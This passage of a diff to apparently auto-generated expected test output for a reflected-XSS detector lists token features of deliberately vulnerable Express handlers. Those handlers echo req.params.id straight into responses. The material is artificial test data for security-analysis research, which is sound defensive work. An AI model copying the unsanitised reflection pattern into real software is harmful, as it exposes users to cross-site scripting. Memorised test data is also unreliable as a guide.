req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:24:30:36 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:28:30:33 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:28:30:33 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:28:30:33 | params | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:28:30:33 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:28:30:33 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:35:30:36 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:35:30:36 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:35:30:36 | id | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:35:30:36 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:30:35:30:36 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:5 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:5 | res | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:5 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:10 | res.send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:10 | res.send | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:10 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:35 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:35 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:35 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:35 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:35 | exceptional return of res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:35 | res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:35 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:35 | res.sen ... ams.id) | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:35 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:3:32:35 | res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:7:32:10 | send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:7:32:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:7:32:10 | send | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:7:32:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:7:32:10 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:18 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:18 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:18 | "FOO: " | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:18 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:18 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:18 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:34 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:34 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:34 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20478,6 +136217,47 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:34 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:34 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:12:32:34 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:24 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:24 | req | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:24 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:24 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:31 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:31 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:31 | req.params | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:31 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:31 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:34 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:34 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:34 | req.params.id | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:34 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:34 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:22:32:34 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:26:32:31 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:26:32:31 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:26:32:31 | params | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:26:32:31 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:26:32:31 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:33:32:34 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:33:32:34 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:33:32:34 | id | enclosingFunctionBody | req res res writeHead 200 Content-Type application/json whatever res send FOO: req params id res send FOO: req params id res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:33:32:34 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:32:33:32:34 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:36:3 | app | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:36:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:36:3 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:36:7 | app.get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:36:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:36:7 | app.get | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:44:2 | app.get ... \\n }\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:44:2 | app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:44:2 | app.get ... \\n }\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:44:2 | exceptional return of app.get ... \\n }\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:44:2 | exceptional return of app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:1:44:2 | exceptional return of app.get ... \\n }\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:5:36:7 | get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:5:36:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:5:36:7 | get | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:9:36:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:9:36:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:9:36:19 | '/user/:id' | calleeImports | express | @@ -20485,6 +136265,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:9:36:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:9:36:19 | '/user/:id' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:9:36:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:36:21 | this | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:36:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:36:21 | this | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:36:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:36:21 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | exceptional return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | exceptional return of anonymous function | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | exceptional return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | functio ... K\\n }\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | functio ... K\\n }\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | functio ... K\\n }\\n} | calleeImports | express | @@ -20492,6 +136287,93 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | functio ... K\\n }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | functio ... K\\n }\\n} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | functio ... K\\n }\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | return of anonymous function | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:22:44:1 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:32:36:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:32:36:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:32:36:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:32:36:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:32:36:34 | req | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:32:36:34 | req | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:32:36:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:32:36:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:32:36:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:32:36:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:37:36:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:37:36:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:37:36:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:37:36:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:37:36:39 | res | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:37:36:39 | res | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:37:36:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:37:36:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:37:36:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:36:37:36:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:37:7:37:9 | err | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:37:7:37:9 | err | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:37:7:37:9 | err | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:37:7:37:9 | err | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:37:7:37:9 | err | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:7 | res | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:18 | res.statusCode | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:18 | res.statusCode | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:18 | res.statusCode | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:18 | res.statusCode | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:18 | res.statusCode | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:24 | res.statusCode = 404 | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:24 | res.statusCode = 404 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:24 | res.statusCode = 404 | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:24 | res.statusCode = 404 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:5:38:24 | res.statusCode = 404 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:9:38:18 | statusCode | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:9:38:18 | statusCode | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:9:38:18 | statusCode | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:9:38:18 | statusCode | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:9:38:18 | statusCode | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:22:38:24 | 404 | assignedToPropName | statusCode | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:22:38:24 | 404 | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:22:38:24 | 404 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:22:38:24 | 404 | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:22:38:24 | 404 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:38:22:38:24 | 404 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:7 | res | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:11 | res.end | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:11 | res.end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:11 | res.end | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:11 | res.end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:11 | res.end | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:36 | exceptional return of res.end ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:36 | exceptional return of res.end ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:36 | exceptional return of res.end ... ams.id) | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:36 | exceptional return of res.end ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:36 | exceptional return of res.end ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:36 | res.end ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:36 | res.end ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:36 | res.end ... ams.id) | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:36 | res.end ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:5:39:36 | res.end ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:9:39:11 | end | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:9:39:11 | end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:9:39:11 | end | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:9:39:11 | end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:9:39:11 | end | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:19 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:19 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:19 | "FOO: " | enclosingFunctionBody | req res err res statusCode 404 res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:19 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:19 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:39:13:39:19 | "FOO: " | 